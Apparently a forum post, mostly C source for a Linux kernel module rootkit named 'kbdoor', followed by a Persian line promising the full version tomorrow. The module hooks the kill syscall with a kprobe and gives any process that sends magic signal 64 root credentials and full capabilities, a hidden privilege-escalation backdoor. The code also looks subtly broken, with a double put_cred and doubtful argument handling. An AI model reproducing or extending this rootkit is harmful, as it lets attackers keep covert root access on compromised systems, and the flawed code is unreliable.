#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/sched.h>
#include <linux/cred.h>
#include <linux/pid.h>
#include <linux/slab.h>
#define MAGIC_SIG 64
static struct kprobe kp;
static int pre_kill(struct kprobe *p, struct pt_regs *regs)
{
int sig = (int)regs->si;
pid_t pid = (pid_t)regs->di;
struct pid *pidp;
struct task_struct *task;
const struct cred *old;
struct cred *new;
if (sig != MAGIC_SIG)
return 0;
pidp = find_vpid(pid);
if (!pidp)
return 0;
task = pid_task(pidp, PIDTYPE_PID);
if (!task || !task->cred)
return 0;
old = task->cred;
new = kmemdup(old, sizeof(struct cred), GFP_KERNEL);
if (!new)
return 0;
atomic_set(&new->usage, 1);
new->uid = new->euid = new->suid = new->fsuid = GLOBAL_ROOT_UID;
new->gid = new->egid = new->sgid = new->fsgid = GLOBAL_ROOT_GID;
new->cap_effective = new->cap_permitted = new->cap_bset = CAP_FULL_SET;
rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);
put_cred(old);
put_cred(old);
pr_info("kbdoor: pid %d -> root\n", pid);
return 0;
}
static int __init init_mod(void)
{
kp.symbol_name = "__x64_sys_kill";
kp.pre_handler = pre_kill;
if (register_kprobe(&kp) < 0)
return -1;
pr_info("kbdoor: loaded\n");
return 0;
}
static void __exit exit_mod(void)
{
unregister_kprobe(&kp);
pr_info("kbdoor: unloaded\n");
}
module_init(init_mod);
module_exit(exit_mod);
MODULE_LICENSE("GPL");
میخوام یه مقدار ماهیت اجرایی این روتکیت گوگولی هستش که حالا اون بخش هوک کردن sys_kill و .... رو جلو ببریم اگه حالا جاییش مشکل داشت میتونین پیویم بیاین بگین که برای فرداشب بخش کاملشو بزارم و لذت ببریم